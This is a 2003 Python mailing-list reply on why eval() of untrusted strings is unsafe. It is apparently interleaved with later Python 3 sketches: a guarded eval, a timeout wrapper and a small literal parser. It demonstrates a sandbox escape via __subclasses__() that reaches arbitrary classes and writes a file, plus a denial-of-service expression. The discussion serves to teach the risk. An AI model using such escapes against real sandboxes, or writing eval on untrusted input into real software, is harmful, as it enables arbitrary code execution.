STRING TO LIST

Beni Cherniavsky cben at techunix.technion.ac.il
Wed Apr 9 13:35:21 EDT 2003


Duncan Booth wrote on 2003-04-09:

> While this works, the original poster should be aware that unless
> he/she has full control over the origin of the string, it could have
> nasty side effects, since the string could do things like opening
> files or even executing arbitrary Python code.

Indeed.  Another attack, besides calling builtins, is mutating
variables local to the caller of `eval` with list comprehensions
(their loop variables leak into the enclosing scope).  This means
that even untrusted code which is itself being safely evaled, without
access to builtins, had better use a safe eval for any third-party
code that it doesn't trust (a sandbox within a sandbox).

> Of course this may not be relevant, but in case it is, a better solution
> is:
>
> >>> x=str("[[12,13],[14,15]]")
> >>> print eval(x, {'__builtins__': {}})
> [[12, 13], [14, 15]]
> >>>
>
Is this completely safe?  First, note that you must catch all
exceptions, because of e.g.:

>>> eval('''1/0''', {'__builtins__': {}})
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "<string>", line 0, in ?
ZeroDivisionError: integer division or modulo by zero
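
A minimal sketch of the "catch all exceptions" point, written for
current Python 3 rather than the 2.2 session above.  The name
`guarded_eval` and its `default` parameter are made up for this
illustration; the wrapper only contains errors and does nothing about
the other problems discussed in this message.

```python
def guarded_eval(source, default=None):
    """Evaluate source with empty builtins; return default on any error.

    guarded_eval is a hypothetical helper name, not a library function.
    """
    try:
        return eval(source, {'__builtins__': {}})
    except Exception:
        # Covers ZeroDivisionError, NameError, SyntaxError and friends.
        return default


print(guarded_eval("[[12,13],[14,15]]"))
print(guarded_eval("1/0"))
```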

Furthermore, can't one do some nasty things through attributes of
builtin types?  Here is a simple security hole (probably highly
dependent on the specific Python version):

Python 2.2.2 (#1, Jan 30 2003, 21:26:22)
[GCC 2.96 20000731 (Red Hat Linux 7.3 2.96-112)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "".__class__
<type 'str'>
>>> "".__class__.__class__
<type 'type'>
>>> "".__class__.__base__
<type 'object'>
>>> dir(type)
['__base__', '__bases__', '__basicsize__', '__call__', '__class__',
'__cmp__', '__delattr__', '__dict__', '__dictoffset__', '__doc__',
'__flags__', '__getattribute__', '__hash__', '__init__',
'__itemsize__', '__module__', '__mro__', '__name__', '__new__',
'__reduce__', '__repr__', '__setattr__', '__str__', '__subclasses__',
'__weakrefoffset__', 'mro']
>>> type.__subclasses__(object)
[<type 'type'>, <type 'list'>, <type 'NoneType'>,
<type 'NotImplementedType'>, <type 'module'>,
<type 'posix.stat_result'>, <type 'posix.statvfs_result'>,
<type 'dict'>, <type 'function'>, <type 'str'>, <type 'file'>]
>>> eval('''[t for t in
...          "".__class__.__class__.__subclasses__(
...                                     "".__class__.__base__)
...          if t.__name__ == "file"][0]''',
...      {'__builtins__': {}})
<type 'file'>
>>> eval('''[t for t in
...          "".__class__.__class__.__subclasses__(
...                                     "".__class__.__base__)
...          if t.__name__ == "file"][0]('CRACK', 'w')''',
...      {'__builtins__': {}})
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "<string>", line 1, in ?
IOError: file() constructor not accessible in restricted mode

What?!  They think they are smarter than I am :-)?  OK, they got me
this time.  How is this "restricted mode" detected anyway?  Does
`file` look up the stack frame to see if it's called from eval, or if
it has no `__builtins__`?  Is it a permanent mode of the interpreter
itself?

In any case, this is something special coded into `file`.  But the
`type.__subclasses__(object)` list above shows all classes your
runtime has, from any module.  In any big program there would be one
that is not protected:

>>> class foo(object):
...   def __init__(self, fname):
...     file(fname, 'w')
...
>>> type.__subclasses__(object)
[<type 'type'>, <type 'list'>, <type 'NoneType'>,
<type 'NotImplementedType'>, <type 'module'>,
<type 'posix.stat_result'>, <type 'posix.statvfs_result'>,
<type 'dict'>, <type 'function'>, <type 'str'>, <type 'file'>,
<class '__main__.foo'>]

Indeed, any class appears!  Now, if I happen to know about this class
in your code, or write some bytecode-disassembling thingie for finding
such classes automatically (I'm pretty sure that lambdas together with
list comprehensions are Turing-complete), I'm in:

>>> eval('''[t for t in
...      "".__class__.__class__.__subclasses__(
...                                 "".__class__.__base__)
...      if t.__name__ == "foo"][0]('CRACK')''',
...      {'__builtins__': {}})
<__main__.foo object at 0x811c4ec>
>>>
[1]+  Stopped                 python2
cben at sc8-pr-shell1:~$ ls CRACK
CRACK

See?
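
For readers on Python 3, where there is no `file` type, the same walk
from a string literal to an arbitrary class can be sketched as below.
`UnprotectedWriter` and `calls` are hypothetical stand-ins for the
`foo` class above; the constructor only records its argument instead
of opening a file, so the demo is harmless.

```python
# Hypothetical "unprotected" class living somewhere in a big program.
# It records the call rather than touching the filesystem.
calls = []


class UnprotectedWriter(object):
    def __init__(self, fname):
        calls.append(fname)


# The untrusted expression uses no names at all, only attribute access
# starting from a string literal: "" -> str -> object -> subclasses.
payload = '''[t for t in "".__class__.__base__.__subclasses__()
              if t.__name__ == "UnprotectedWriter"][0]("CRACK")'''

result = eval(payload, {'__builtins__': {}})
print(type(result).__name__, calls)
```

Emptying `__builtins__` does not hide the class: it is found and
instantiated anyway.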

Another point is that it's trivial to write fairly short list
comprehensions that will block for a very long time, or forever, and
possibly exhaust your memory.  Actually you don't need list
comprehensions for this; something as simple as ``eval('2**(2**20)')``
took too long for my patience...  So even the safest `eval` will
always be open to denial-of-service attacks!  I wonder whether a
timeout and a memory limit can be implemented to avoid it...
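
One way a timeout might be approached, as a rough sketch in Python 3
(3.7 or later for `capture_output`): run the evaluation in a child
interpreter and kill it when it overruns.  The helper name
`eval_with_timeout`, the `CHILD` one-liner and the default of five
seconds are assumptions made for this illustration.  It covers the
timeout only; a memory cap would need something extra in the child,
such as `resource.setrlimit` on POSIX, which is not shown.

```python
import subprocess
import sys

# Child program: evaluate argv[1] with empty builtins, print its repr.
CHILD = "import sys; print(repr(eval(sys.argv[1], {'__builtins__': {}})))"


def eval_with_timeout(source, seconds=5.0):
    """Return the repr of the result, or None on timeout or error.

    eval_with_timeout is a hypothetical helper, not a library function.
    """
    try:
        proc = subprocess.run(
            [sys.executable, "-c", CHILD, source],
            capture_output=True, text=True, timeout=seconds,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before re-raising.
        return None
    if proc.returncode != 0:
        # The expression raised an exception inside the child.
        return None
    return proc.stdout.strip()


# Loops about 10**12 times while keeping the result list empty.
SLOW = "[0 for a in [0]*10**4 for b in [0]*10**4 for c in [0]*10**4 if a]"

print(eval_with_timeout("[[12,13],[14,15]]"))
print(eval_with_timeout(SLOW, seconds=1.0))
```

The result comes back as a string, so the parent never evaluates
anything itself; turning that string into data again is the "read
without eval" problem.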

Still, frequently you don't need the flexibility of allowing real code
(with more or less restrictions), you just want to read some constant
data.  It's the most natural thing for a LISPer: read without eval.
OK, in Python *there isn't* any read syntax for lists, tuples and
dicts; there are only "displays" (the analogue of the list function as
compared to the quote special form).  But it'd be trivial to define.
So why doesn't Python have some builtin to parse it?  (Don't tell me
about pickle, it's not very readable <wink> and certainly not
secure...).
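
To give an idea of how small such a reader can be, here is a sketch
that handles only nested lists of integers, which is all the original
question needs.  The names `read_list`, `_read_value` and `TOKEN` are
invented for this example, and it is not hardened (very deep nesting
will hit the recursion limit, for instance).

```python
import re

# One token: an optionally signed integer, a bracket, or a comma.
TOKEN = re.compile(r"\s*(-?\d+|[\[\],])")


def read_list(text):
    """Parse nested lists of integers without evaluating any code."""
    text = text.strip()
    tokens, pos = [], 0
    while pos < len(text):
        match = TOKEN.match(text, pos)
        if match is None:
            raise ValueError("unexpected character at offset %d" % pos)
        tokens.append(match.group(1))
        pos = match.end()
    value, end = _read_value(tokens, 0)
    if end != len(tokens):
        raise ValueError("trailing input after the first value")
    return value


def _read_value(tokens, i):
    """Return (value, index of the next unread token)."""
    if i >= len(tokens):
        raise ValueError("unexpected end of input")
    tok = tokens[i]
    if tok == "[":
        items = []
        i += 1
        while True:
            if i >= len(tokens):
                raise ValueError("missing closing bracket")
            if tokens[i] == "]":
                return items, i + 1
            item, i = _read_value(tokens, i)
            items.append(item)
            if i < len(tokens) and tokens[i] == ",":
                i += 1
            elif i >= len(tokens) or tokens[i] != "]":
                raise ValueError("expected ',' or ']'")
    if tok in ("]", ","):
        raise ValueError("unexpected %r" % tok)
    return int(tok), i + 1


print(read_list("[[12,13],[14,15]]"))
```

Anything that is not a bracket, a comma or an integer is rejected with
ValueError, so there are no names or attributes to abuse.  (Later
Python versions, 2.6 and up, ship `ast.literal_eval`, which covers
this case for the standard literal types.)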

-- 
Beni Cherniavsky <cben at tx.technion.ac.il>




